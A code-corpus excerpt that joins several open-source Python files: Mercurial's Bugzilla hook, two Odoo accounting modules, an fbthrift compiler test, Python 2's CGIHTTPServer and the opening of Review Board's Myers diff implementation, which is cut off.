cookies = []
def send_cookies(self, connection):
if self.cookies:
for cookie in self.cookies:
connection.putheader("Cookie", cookie)
def request(self, host, handler, request_body, verbose=0):
self.verbose = verbose
self.accept_gzip_encoding = False
# issue XML-RPC request
h = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
self.send_request(h, handler, request_body)
self.send_host(h, host)
self.send_cookies(h)
self.send_user_agent(h)
self.send_content(h, request_body)
# Deal with differences between Python 2.4-2.6 and 2.7.
# In the former h is a HTTP(S). In the latter it's a
# HTTP(S)Connection. Luckily, the 2.4-2.6 implementation of
# HTTP(S) has an underlying HTTP(S)Connection, so extract
# that and use it.
try:
response = h.getresponse()
except AttributeError:
response = h._conn.getresponse()
# Add any cookie definitions to our list.
for header in response.msg.getallmatchingheaders("Set-Cookie"):
val = header.split(": ", 1)[1]
cookie = val.split(";", 1)[0]
self.cookies.append(cookie)
if response.status != 200:
raise xmlrpclib.ProtocolError(host + handler, response.status,
response.reason, response.msg.headers)
payload = response.read()
parser, unmarshaller = self.getparser()
parser.feed(payload)
parser.close()
return unmarshaller.close()
# The explicit calls to the underlying xmlrpclib __init__() methods are
# necessary. The xmlrpclib.Transport classes are old-style classes, and
# it turns out their __init__() doesn't get called when doing multiple
# inheritance with a new-style class.
class cookietransport(cookietransportrequest, xmlrpclib.Transport):
def __init__(self, use_datetime=0):
if util.safehasattr(xmlrpclib.Transport, "__init__"):
xmlrpclib.Transport.__init__(self, use_datetime)
class cookiesafetransport(cookietransportrequest, xmlrpclib.SafeTransport):
def __init__(self, use_datetime=0):
if util.safehasattr(xmlrpclib.Transport, "__init__"):
xmlrpclib.SafeTransport.__init__(self, use_datetime)
class bzxmlrpc(bzaccess):
"""Support for access to Bugzilla via the Bugzilla XMLRPC API.
Requires a minimum Bugzilla version 3.4.
"""
def __init__(self, ui):
bzaccess.__init__(self, ui)
bzweb = self.ui.config('bugzilla', 'bzurl',
'http://localhost/bugzilla/')
bzweb = bzweb.rstrip("/") + "/xmlrpc.cgi"
user = self.ui.config('bugzilla', 'user', 'bugs')
passwd = self.ui.config('bugzilla', 'password')
self.fixstatus = self.ui.config('bugzilla', 'fixstatus', 'RESOLVED')
self.fixresolution = self.ui.config('bugzilla', 'fixresolution',
'FIXED')
self.bzproxy = xmlrpclib.ServerProxy(bzweb, self.transport(bzweb))
ver = self.bzproxy.Bugzilla.version()['version'].split('.')
self.bzvermajor = int(ver[0])
self.bzverminor = int(ver[1])
self.bzproxy.User.login(dict(login=user, password=passwd))
def transport(self, uri):
if urlparse.urlparse(uri, "http")[0] == "https":
return cookiesafetransport()
else:
return cookietransport()
def get_bug_comments(self, id):
"""Return a string with all comment text for a bug."""
c = self.bzproxy.Bug.comments(dict(ids=[id], include_fields=['text']))
return ''.join([t['text'] for t in c['bugs'][str(id)]['comments']])
def filter_real_bug_ids(self, bugs):
probe = self.bzproxy.Bug.get(dict(ids=sorted(bugs.keys()),
include_fields=[],
permissive=True))
for badbug in probe['faults']:
id = badbug['id']
self.ui.status(_('bug %d does not exist\n') % id)
del bugs[id]
def filter_cset_known_bug_ids(self, node, bugs):
for id in sorted(bugs.keys()):
if self.get_bug_comments(id).find(short(node)) != -1:
self.ui.status(_('bug %d already knows about changeset %s\n') %
(id, short(node)))
del bugs[id]
def updatebug(self, bugid, newstate, text, committer):
args = {}
if 'hours' in newstate:
args['work_time'] = newstate['hours']
if self.bzvermajor >= 4:
args['ids'] = [bugid]
args['comment'] = {'body' : text}
if 'fix' in newstate:
args['status'] = self.fixstatus
args['resolution'] = self.fixresolution
self.bzproxy.Bug.update(args)
else:
if 'fix' in newstate:
self.ui.warn(_("Bugzilla/XMLRPC needs Bugzilla 4.0 or later "
"to mark bugs fixed\n"))
args['id'] = bugid
args['comment'] = text
self.bzproxy.Bug.add_comment(args)
class bzxmlrpcemail(bzxmlrpc):
"""Read data from Bugzilla via XMLRPC, send updates via email.
Advantages of sending updates via email:
1. Comments can be added as any user, not just logged in user.
2. Bug statuses or other fields not accessible via XMLRPC can
potentially be updated.
There is no XMLRPC function to change bug status before Bugzilla
4.0, so bugs cannot be marked fixed via XMLRPC before Bugzilla 4.0.
But bugs can be marked fixed via email from 3.4 onwards.
"""
# The email interface changes subtly between 3.4 and 3.6. In 3.4,
# in-email fields are specified as '@<fieldname> = <value>'. In
# 3.6 this becomes '@<fieldname> <value>'. And fieldname @bug_id
# in 3.4 becomes @id in 3.6. 3.6 and 4.0 both maintain backwards
# compatibility, but rather than rely on this use the new format for
# 4.0 onwards.
def __init__(self, ui):
bzxmlrpc.__init__(self, ui)
self.bzemail = self.ui.config('bugzilla', 'bzemail')
if not self.bzemail:
raise util.Abort(_("configuration 'bzemail' missing"))
mail.validateconfig(self.ui)
def makecommandline(self, fieldname, value):
if self.bzvermajor >= 4:
return "@%s %s" % (fieldname, str(value))
else:
if fieldname == "id":
fieldname = "bug_id"
return "@%s = %s" % (fieldname, str(value))
def send_bug_modify_email(self, bugid, commands, comment, committer):
'''send modification message to Bugzilla bug via email.
The message format is documented in the Bugzilla email_in.pl
specification. commands is a list of command lines, comment is the
comment text.
To stop users from crafting commit comments with
Bugzilla commands, specify the bug ID via the message body, rather
than the subject line, and leave a blank line after it.
'''
user = self.map_committer(committer)
matches = self.bzproxy.User.get(dict(match=[user]))
if not matches['users']:
user = self.ui.config('bugzilla', 'user', 'bugs')
matches = self.bzproxy.User.get(dict(match=[user]))
if not matches['users']:
raise util.Abort(_("default bugzilla user %s email not found") %
user)
user = matches['users'][0]['email']
commands.append(self.makecommandline("id", bugid))
text = "\n".join(commands) + "\n\n" + comment
_charsets = mail._charsets(self.ui)
user = mail.addressencode(self.ui, user, _charsets)
bzemail = mail.addressencode(self.ui, self.bzemail, _charsets)
msg = mail.mimeencode(self.ui, text, _charsets)
msg['From'] = user
msg['To'] = bzemail
msg['Subject'] = mail.headencode(self.ui, "Bug modification", _charsets)
sendmail = mail.connect(self.ui)
sendmail(user, bzemail, msg.as_string())
def updatebug(self, bugid, newstate, text, committer):
cmds = []
if 'hours' in newstate:
cmds.append(self.makecommandline("work_time", newstate['hours']))
if 'fix' in newstate:
cmds.append(self.makecommandline("bug_status", self.fixstatus))
cmds.append(self.makecommandline("resolution", self.fixresolution))
self.send_bug_modify_email(bugid, cmds, text, committer)
class bugzilla(object):
# supported versions of bugzilla. different versions have
# different schemas.
_versions = {
'2.16': bzmysql,
'2.18': bzmysql_2_18,
'3.0': bzmysql_3_0,
'xmlrpc': bzxmlrpc,
'xmlrpc+email': bzxmlrpcemail
}
_default_bug_re = (r'bugs?\s*,?\s*(?:#|nos?\.?|num(?:ber)?s?)?\s*'
r'(?P<ids>(?:\d+\s*(?:,?\s*(?:and)?)?\s*)+)'
r'\.?\s*(?:h(?:ours?)?\s*(?P<hours>\d*(?:\.\d+)?))?')
_default_fix_re = (r'fix(?:es)?\s*(?:bugs?\s*)?,?\s*'
r'(?:nos?\.?|num(?:ber)?s?)?\s*'
r'(?P<ids>(?:#?\d+\s*(?:,?\s*(?:and)?)?\s*)+)'
r'\.?\s*(?:h(?:ours?)?\s*(?P<hours>\d*(?:\.\d+)?))?')
_bz = None
def __init__(self, ui, repo):
self.ui = ui
self.repo = repo
def bz(self):
'''return object that knows how to talk to bugzilla version in
use.'''
if bugzilla._bz is None:
bzversion = self.ui.config('bugzilla', 'version')
try:
bzclass = bugzilla._versions[bzversion]
except KeyError:
raise util.Abort(_('bugzilla version %s not supported') %
bzversion)
bugzilla._bz = bzclass(self.ui)
return bugzilla._bz
def __getattr__(self, key):
return getattr(self.bz(), key)
_bug_re = None
_fix_re = None
_split_re = None
def find_bugs(self, ctx):
'''return bugs dictionary created from commit comment.
Extract bug info from changeset comments. Filter out any that are
not known to Bugzilla, and any that already have a reference to
the given changeset in their comments.
'''
if bugzilla._bug_re is None:
bugzilla._bug_re = re.compile(
self.ui.config('bugzilla', 'regexp',
bugzilla._default_bug_re), re.IGNORECASE)
bugzilla._fix_re = re.compile(
self.ui.config('bugzilla', 'fixregexp',
bugzilla._default_fix_re), re.IGNORECASE)
bugzilla._split_re = re.compile(r'\D+')
start = 0
hours = 0.0
bugs = {}
bugmatch = bugzilla._bug_re.search(ctx.description(), start)
fixmatch = bugzilla._fix_re.search(ctx.description(), start)
while True:
bugattribs = {}
if not bugmatch and not fixmatch:
break
if not bugmatch:
m = fixmatch
elif not fixmatch:
m = bugmatch
else:
if bugmatch.start() < fixmatch.start():
m = bugmatch
else:
m = fixmatch
start = m.end()
if m is bugmatch:
bugmatch = bugzilla._bug_re.search(ctx.description(), start)
if 'fix' in bugattribs:
del bugattribs['fix']
else:
fixmatch = bugzilla._fix_re.search(ctx.description(), start)
bugattribs['fix'] = None
try:
ids = m.group('ids')
except IndexError:
ids = m.group(1)
try:
hours = float(m.group('hours'))
bugattribs['hours'] = hours
except IndexError:
pass
except TypeError:
pass
except ValueError:
self.ui.status(_("%s: invalid hours\n") % m.group('hours'))
for id in bugzilla._split_re.split(ids):
if not id:
continue
bugs[int(id)] = bugattribs
if bugs:
self.filter_real_bug_ids(bugs)
if bugs:
self.filter_cset_known_bug_ids(ctx.node(), bugs)
return bugs
def update(self, bugid, newstate, ctx):
'''update bugzilla bug with reference to changeset.'''
def webroot(root):
'''strip leading prefix of repo root and turn into
url-safe path.'''
count = int(self.ui.config('bugzilla', 'strip', 0))
root = util.pconvert(root)
while count > 0:
c = root.find('/')
if c == -1:
break
root = root[c + 1:]
count -= 1
return root
mapfile = self.ui.config('bugzilla', 'style')
tmpl = self.ui.config('bugzilla', 'template')
t = cmdutil.changeset_templater(self.ui, self.repo,
False, None, mapfile, False)
if not mapfile and not tmpl:
tmpl = _('changeset {node|short} in repo {root} refers '
'to bug {bug}.\ndetails:\n\t{desc|tabindent}')
if tmpl:
tmpl = templater.parsestring(tmpl, quoted=False)
t.use_template(tmpl)
self.ui.pushbuffer()
t.show(ctx, changes=ctx.changeset(),
bug=str(bugid),
hgweb=self.ui.config('web', 'baseurl'),
root=self.repo.root,
webroot=webroot(self.repo.root))
data = self.ui.popbuffer()
self.updatebug(bugid, newstate, data, util.email(ctx.user()))
def hook(ui, repo, hooktype, node=None, **kwargs):
'''add comment to bugzilla for each changeset that refers to a
bugzilla bug id. only add a comment once per bug, so same change
seen multiple times does not fill bug with duplicate data.'''
if node is None:
raise util.Abort(_('hook type %s does not pass a changeset id') %
hooktype)
try:
bz = bugzilla(ui, repo)
ctx = repo[node]
bugs = bz.find_bugs(ctx)
if bugs:
for bug in bugs:
bz.update(bug, bugs[bug], ctx)
bz.notify(bugs, util.email(ctx.user()))
except Exception, e:
raise util.Abort(_('Bugzilla error: %s') % e)
| apache-2.0 |
hoatle/odoo | addons/account_check_writing/report/check_print.py | 320 | 2943 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
class report_print_check(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(report_print_check, self).__init__(cr, uid, name, context)
self.number_lines = 0
self.number_add = 0
self.localcontext.update({
'time': time,
'get_lines': self.get_lines,
'fill_stars' : self.fill_stars,
})
def fill_stars(self, amount):
if len(amount) < 100:
stars = 100 - len(amount)
return ' '.join([amount,'*'*stars])
else: return amount
def get_lines(self, voucher_lines):
result = []
self.number_lines = len(voucher_lines)
for i in range(0, min(10,self.number_lines)):
if i < self.number_lines:
res = {
'date_due' : voucher_lines[i].date_due,
'name' : voucher_lines[i].name,
'amount_original' : voucher_lines[i].amount_original and voucher_lines[i].amount_original or False,
'amount_unreconciled' : voucher_lines[i].amount_unreconciled and voucher_lines[i].amount_unreconciled or False,
'amount' : voucher_lines[i].amount and voucher_lines[i].amount or False,
}
else :
res = {
'date_due' : False,
'name' : False,
'amount_original' : False,
'amount_due' : False,
'amount' : False,
}
result.append(res)
return result
class report_check(osv.AbstractModel):
_name = 'report.account_check_writing.report_check'
_inherit = 'report.abstract_report'
_template = 'account_check_writing.report_check'
_wrapped_report_class = report_print_check
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
camptocamp/odoo | addons/account/wizard/account_reconcile_partner_process.py | 385 | 5775 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_partner_reconcile_process(osv.osv_memory):
_name = 'account.partner.reconcile.process'
_description = 'Reconcilation Process partner by partner'
def _get_to_reconcile(self, cr, uid, context=None):
cr.execute("""
SELECT p_id FROM (SELECT l.partner_id as p_id, SUM(l.debit) AS debit, SUM(l.credit) AS credit
FROM account_move_line AS l LEFT JOIN account_account a ON (l.account_id = a.id)
LEFT JOIN res_partner p ON (p.id = l.partner_id)
WHERE a.reconcile = 't'
AND l.reconcile_id IS NULL
AND (%s > to_char(p.last_reconciliation_date, 'YYYY-MM-DD') OR p.last_reconciliation_date IS NULL )
AND l.state <> 'draft'
GROUP BY l.partner_id) AS tmp
WHERE debit > 0
AND credit > 0
""",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) - 1
def _get_today_reconciled(self, cr, uid, context=None):
cr.execute(
"SELECT l.partner_id " \
"FROM account_move_line AS l LEFT JOIN res_partner p ON (p.id = l.partner_id) " \
"WHERE l.reconcile_id IS NULL " \
"AND %s = to_char(p.last_reconciliation_date, 'YYYY-MM-DD') " \
"AND l.state <> 'draft' " \
"GROUP BY l.partner_id ",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) + 1
def _get_partner(self, cr, uid, context=None):
move_line_obj = self.pool.get('account.move.line')
partner = move_line_obj.list_partners_to_reconcile(cr, uid, context=context)
if not partner:
return False
return partner[0][0]
def data_get(self, cr, uid, to_reconcile, today_reconciled, context=None):
return {'progress': (100 / (float(to_reconcile + today_reconciled) or 1.0)) * today_reconciled}
def default_get(self, cr, uid, fields, context=None):
res = super(account_partner_reconcile_process, self).default_get(cr, uid, fields, context=context)
if 'to_reconcile' in res and 'today_reconciled' in res:
data = self.data_get(cr, uid, res['to_reconcile'], res['today_reconciled'], context)
res.update(data)
return res
def next_partner(self, cr, uid, ids, context=None):
if context is None:
context = {}
move_line_obj = self.pool.get('account.move.line')
res_partner_obj = self.pool.get('res.partner')
partner_id = move_line_obj.read(cr, uid, context['active_id'], ['partner_id'])['partner_id']
if partner_id:
res_partner_obj.write(cr, uid, partner_id[0], {'last_reconciliation_date': time.strftime('%Y-%m-%d')}, context)
#TODO: we have to find a way to update the context of the current tab (we could open a new tab with the context but it's not really handy)
#TODO: remove that comments when the client side dev is done
return {'type': 'ir.actions.act_window_close'}
_columns = {
'to_reconcile': fields.float('Remaining Partners', readonly=True, help='This is the remaining partners for who you should check if there is something to reconcile or not. This figure already count the current partner as reconciled.'),
'today_reconciled': fields.float('Partners Reconciled Today', readonly=True, help='This figure depicts the total number of partners that have gone throught the reconciliation process today. The current partner is counted as already processed.'),
'progress': fields.float('Progress', readonly=True, help='Shows you the progress made today on the reconciliation process. Given by \nPartners Reconciled Today \ (Remaining Partners + Partners Reconciled Today)'),
'next_partner_id': fields.many2one('res.partner', 'Next Partner to Reconcile', readonly=True, help='This field shows you the next partner that will be automatically chosen by the system to go through the reconciliation process, based on the latest day it have been reconciled.'), # TODO: remove the readonly=True when teh client side will allow to update the context of existing tab, so that the user can change this value if he doesn't want to follow openerp proposal
}
_defaults = {
'to_reconcile': _get_to_reconcile,
'today_reconciled': _get_today_reconciled,
'next_partner_id': _get_partner,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
LinusU/fbthrift | thrift/compiler/test/compiler_test.py | 1 | 4049 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import pkg_resources
import re
import unittest
import shlex
import shutil
import subprocess
import sys
import tempfile
import traceback
def ascend_find_exe(path, target):
if not os.path.isdir(path):
path = os.path.dirname(path)
while True:
test = os.path.join(path, target)
if os.access(test, os.X_OK):
return test
parent = os.path.dirname(path)
if os.path.samefile(parent, path):
return None
path = parent
def read_file(path):
with open(path, 'r') as f:
return f.read()
def write_file(path, content):
with open(path, 'w') as f:
f.write(content)
def read_resource(path):
return pkg_resources.resource_string(__name__, path)
def read_lines(path):
with open(path, 'r') as f:
return f.readlines()
def mkdir_p(path, mode):
if not os.path.isdir(path):
os.makedirs(path, mode)
def parse_manifest(raw):
manifest = {}
for line in raw.splitlines():
fixture, filename = line.split('/', 1)
if fixture not in manifest:
manifest[fixture] = []
manifest[fixture].append(filename)
return manifest
exe = os.path.join(os.getcwd(), sys.argv[0])
thrift = ascend_find_exe(exe, 'thrift')
fixtureDir = 'fixtures'
manifest = parse_manifest(read_resource(os.path.join(fixtureDir, 'MANIFEST')))
fixtureNames = manifest.keys()
class CompilerTest(unittest.TestCase):
MSG = " ".join([
"One or more fixtures are out of sync with the thrift compiler.",
"To sync them, build thrift and then run:",
"`thrift/compiler/test/build_fixtures <build-dir>`, where",
"<build-dir> is a path where the program `thrift/compiler/thrift`",
"may be found.",
])
def setUp(self):
tmp = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmp, True)
self.tmp = tmp
self.maxDiff = None
def runTest(self, name):
fixtureChildDir = os.path.join(fixtureDir, name)
cmdc = read_resource(os.path.join(fixtureChildDir, 'cmd'))
write_file(os.path.join(self.tmp, "cmd"), cmdc)
for fn in manifest[name]:
if fn.startswith('src/'):
out = os.path.join(self.tmp, fn)
mkdir_p(os.path.dirname(out), 0o700)
srcc = read_resource(os.path.join(fixtureChildDir, fn))
write_file(out, srcc)
cmds = read_lines(os.path.join(self.tmp, 'cmd'))
for cmd in cmds:
args = shlex.split(cmd.strip())
if args[0].startswith("cpp"):
path = os.path.join("thrift/compiler/test/fixtures", name)
extra = "include_prefix=" + path
join = "," if ":" in args[0] else ":"
args[0] = args[0] + join + extra
subprocess.check_call(
[thrift, '-r', '--gen'] + args,
cwd=self.tmp,
close_fds=True,
)
gens = subprocess.check_output(
["find", ".", "-type", "f"],
cwd=self.tmp,
close_fds=True,
).splitlines()
gens = [gen.split('/', 1)[1] for gen in gens]
try:
self.assertEqual(sorted(gens), sorted(manifest[name]))
for gen in gens:
genc = read_file(os.path.join(self.tmp, gen))
fixc = read_resource(os.path.join(fixtureChildDir, gen))
self.assertMultiLineEqual(genc, fixc)
except Exception as e:
print(self.MSG, file=sys.stderr)
traceback.print_exc(file=sys.stderr)
raise e
def add_fixture(klazz, name):
def test_method(self):
self.runTest(name)
test_method.__name__ = str('test_' + re.sub('[^0-9a-zA-Z]', '_', name))
setattr(klazz, test_method.__name__, test_method)
for name in fixtureNames:
add_fixture(CompilerTest, name)
| apache-2.0 |
barbarubra/Don-t-know-What-i-m-doing. | python/src/Lib/CGIHTTPServer.py | 59 | 12687 | """CGI-savvy HTTP Server.
This module builds on SimpleHTTPServer by implementing GET and POST
requests to cgi-bin scripts.
If the os.fork() function is not present (e.g. on Windows),
os.popen2() is used as a fallback, with slightly altered semantics; if
that function is not present either (e.g. on Macintosh), only Python
scripts are supported, and they are executed by the current process.
In all cases, the implementation is intentionally naive -- all
requests are executed sychronously.
SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL
-- it may execute arbitrary Python code or external programs.
Note that status code 200 is sent prior to execution of a CGI script, so
scripts cannot send other status codes such as 302 (redirect).
"""
__version__ = "0.4"
__all__ = ["CGIHTTPRequestHandler"]
import os
import sys
import urllib
import BaseHTTPServer
import SimpleHTTPServer
import select
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Complete HTTP server with GET, HEAD and POST commands.
GET and HEAD also support running CGI scripts.
The POST command is *only* implemented for CGI scripts.
"""
# Determine platform specifics
have_fork = hasattr(os, 'fork')
have_popen2 = hasattr(os, 'popen2')
have_popen3 = hasattr(os, 'popen3')
# Make rfile unbuffered -- we need to read one line and then pass
# the rest to a subprocess, so we can't use buffered input.
rbufsize = 0
def do_POST(self):
"""Serve a POST request.
This is only implemented for CGI scripts.
"""
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
"""Version of send_head that support CGI scripts"""
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
"""Test whether self.path corresponds to a CGI script,
and return a boolean.
This function sets self.cgi_info to a tuple (dir, rest)
when it returns True, where dir is the directory part before
the CGI script name. Note that rest begins with a
slash if it is not empty.
The default implementation tests whether the path
begins with one of the strings in the list
self.cgi_directories (and the next character is a '/'
or the end of the string).
"""
path = self.path
for x in self.cgi_directories:
i = len(x)
if path[:i] == x and (not path[i:] or path[i] == '/'):
self.cgi_info = path[:i], path[i+1:]
return True
return False
cgi_directories = ['/cgi-bin', '/htbin']
def is_executable(self, path):
"""Test whether argument path is an executable file."""
return executable(path)
def is_python(self, path):
"""Test whether argument path is a Python script."""
head, tail = os.path.splitext(path)
return tail.lower() in (".py", ".pyw")
def run_cgi(self):
"""Execute a CGI script."""
path = self.path
dir, rest = self.cgi_info
i = path.find('/', len(dir) + 1)
while i >= 0:
nextdir = path[:i]
nextrest = path[i+1:]
scriptdir = self.translate_path(nextdir)
if os.path.isdir(scriptdir):
dir, rest = nextdir, nextrest
i = path.find('/', len(dir) + 1)
else:
break
# find an explicit query string, if present.
i = rest.rfind('?')
if i >= 0:
rest, query = rest[:i], rest[i+1:]
else:
query = ''
# dissect the part after the directory name into a script name &
# a possible additional path, to be stored in PATH_INFO.
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%r)" % scriptname)
return
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%r)" %
scriptname)
return
ispy = self.is_python(scriptname)
if not ispy:
if not (self.have_fork or self.have_popen2 or self.have_popen3):
self.send_error(403, "CGI script is not a Python script (%r)" %
scriptname)
return
if not self.is_executable(scriptfile):
self.send_error(403, "CGI script is not executable (%r)" %
scriptname)
return
# Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
# XXX Much of the following could be prepared ahead of time!
env = {}
env['SERVER_SOFTWARE'] = self.version_string()
env['SERVER_NAME'] = self.server.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PROTOCOL'] = self.protocol_version
env['SERVER_PORT'] = str(self.server.server_port)
env['REQUEST_METHOD'] = self.command
uqrest = urllib.unquote(rest)
env['PATH_INFO'] = uqrest
env['PATH_TRANSLATED'] = self.translate_path(uqrest)
env['SCRIPT_NAME'] = scriptname
if query:
env['QUERY_STRING'] = query
host = self.address_string()
if host != self.client_address[0]:
env['REMOTE_HOST'] = host
env['REMOTE_ADDR'] = self.client_address[0]
authorization = self.headers.getheader("authorization")
if authorization:
authorization = authorization.split()
if len(authorization) == 2:
import base64, binascii
env['AUTH_TYPE'] = authorization[0]
if authorization[0].lower() == "basic":
try:
authorization = base64.decodestring(authorization[1])
except binascii.Error:
pass
else:
authorization = authorization.split(':')
if len(authorization) == 2:
env['REMOTE_USER'] = authorization[0]
# XXX REMOTE_IDENT
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
referer = self.headers.getheader('referer')
if referer:
env['HTTP_REFERER'] = referer
accept = []
for line in self.headers.getallmatchingheaders('accept'):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(',')
env['HTTP_ACCEPT'] = ','.join(accept)
ua = self.headers.getheader('user-agent')
if ua:
env['HTTP_USER_AGENT'] = ua
co = filter(None, self.headers.getheaders('cookie'))
if co:
env['HTTP_COOKIE'] = ', '.join(co)
# XXX Other HTTP_* headers
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
'HTTP_USER_AGENT', 'HTTP_COOKIE', 'HTTP_REFERER'):
env.setdefault(k, "")
os.environ.update(env)
self.send_response(200, "Script output follows")
decoded_query = query.replace('+', ' ')
if self.have_fork:
# Unix -- fork as we should
args = [script]
if '=' not in decoded_query:
args.append(decoded_query)
nobody = nobody_uid()
self.wfile.flush() # Always flush before forking
pid = os.fork()
if pid != 0:
# Parent
pid, sts = os.waitpid(pid, 0)
# throw away additional data [see bug #427345]
while select.select([self.rfile], [], [], 0)[0]:
if not self.rfile.read(1):
break
if sts:
self.log_error("CGI script exit status %#x", sts)
return
# Child
try:
try:
os.setuid(nobody)
except os.error:
pass
os.dup2(self.rfile.fileno(), 0)
os.dup2(self.wfile.fileno(), 1)
os.execve(scriptfile, args, os.environ)
except:
self.server.handle_error(self.request, self.client_address)
os._exit(127)
elif self.have_popen2 or self.have_popen3:
# Windows -- use popen2 or popen3 to create a subprocess
import shutil
if self.have_popen3:
popenx = os.popen3
else:
popenx = os.popen2
cmdline = scriptfile
if self.is_python(scriptfile):
interp = sys.executable
if interp.lower().endswith("w.exe"):
# On Windows, use python.exe, not pythonw.exe
interp = interp[:-5] + interp[-4:]
cmdline = "%s -u %s" % (interp, cmdline)
if '=' not in query and '"' not in query:
cmdline = '%s "%s"' % (cmdline, query)
self.log_message("command: %s", cmdline)
try:
nbytes = int(length)
except (TypeError, ValueError):
nbytes = 0
files = popenx(cmdline, 'b')
fi = files[0]
fo = files[1]
if self.have_popen3:
fe = files[2]
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
fi.write(data)
# throw away additional data [see bug #427345]
while select.select([self.rfile._sock], [], [], 0)[0]:
if not self.rfile._sock.recv(1):
break
fi.close()
shutil.copyfileobj(fo, self.wfile)
if self.have_popen3:
errors = fe.read()
fe.close()
if errors:
self.log_error('%s', errors)
sts = fo.close()
if sts:
self.log_error("CGI script exit status %#x", sts)
else:
self.log_message("CGI script exited OK")
else:
# Other O.S. -- execute script in this process
save_argv = sys.argv
save_stdin = sys.stdin
save_stdout = sys.stdout
save_stderr = sys.stderr
try:
save_cwd = os.getcwd()
try:
sys.argv = [scriptfile]
if '=' not in decoded_query:
sys.argv.append(decoded_query)
sys.stdout = self.wfile
sys.stdin = self.rfile
execfile(scriptfile, {"__name__": "__main__"})
finally:
sys.argv = save_argv
sys.stdin = save_stdin
sys.stdout = save_stdout
sys.stderr = save_stderr
os.chdir(save_cwd)
except SystemExit, sts:
self.log_error("CGI script exit status %s", str(sts))
else:
self.log_message("CGI script exited OK")
nobody = None
def nobody_uid():
"""Internal routine to get nobody's uid"""
global nobody
if nobody:
return nobody
try:
import pwd
except ImportError:
return -1
try:
nobody = pwd.getpwnam('nobody')[2]
except KeyError:
nobody = 1 + max(map(lambda x: x[2], pwd.getpwall()))
return nobody
def executable(path):
"""Test for executable file."""
try:
st = os.stat(path)
except os.error:
return False
return st.st_mode & 0111 != 0
def test(HandlerClass = CGIHTTPRequestHandler,
ServerClass = BaseHTTPServer.HTTPServer):
SimpleHTTPServer.test(HandlerClass, ServerClass)
if __name__ == '__main__':
test()
| apache-2.0 |
KnowNo/reviewboard | reviewboard/diffviewer/myersdiff.py | 9 | 25557 | from __future__ import unicode_literals
from django.utils.six.moves import range
from reviewboard.diffviewer.differ import Differ, DiffCompatVersion
class MyersDiffer(Differ):
"""
An implementation of Eugene Myers's O(ND) Diff algorithm based on GNU diff.
"""
SNAKE_LIMIT = 20
DISCARD_NONE = 0
DISCARD_FOUND = 1
DISCARD_CANCEL = 2
# The Myers diff algorithm effectively turns the diff problem into a graph
# search. It works by finding the "shortest middle snake," which
class DiffData:
def __init__(self, data):
self.data = data
self.length = len(data)
self.modified = {}
self.undiscarded = []
self.undiscarded_lines = 0
self.real_indexes = []
def __init__(self, *args, **kwargs):
super(MyersDiffer, self).__init__(*args, **kwargs)
self.code_table = {}
self.last_code = 0
self.a_data = self.b_data = None
self.minimal_diff = False
self.interesting_line_table = {}
# SMS State
self.max_lines = 0
self.fdiag = None
self.bdiag = None
def ratio(self):
self._gen_diff_data()
a_equals = self.a_data.length - len(self.a_data.modified)
b_equals = self.b_data.length - len(self.b_data.modified)
return 1.0 * (a_equals + b_equals) / \
(self.a_data.length + self.b_data.length)
def get_opcodes(self):
"""
Generator that returns opcodes representing the contents of the
diff.
The resulting opcodes are in the format of
(tag, i1, i2, j1, j2)
"""
self._gen_diff_data()
if self.a_data.length == 0 and self.b_data.length == 0:
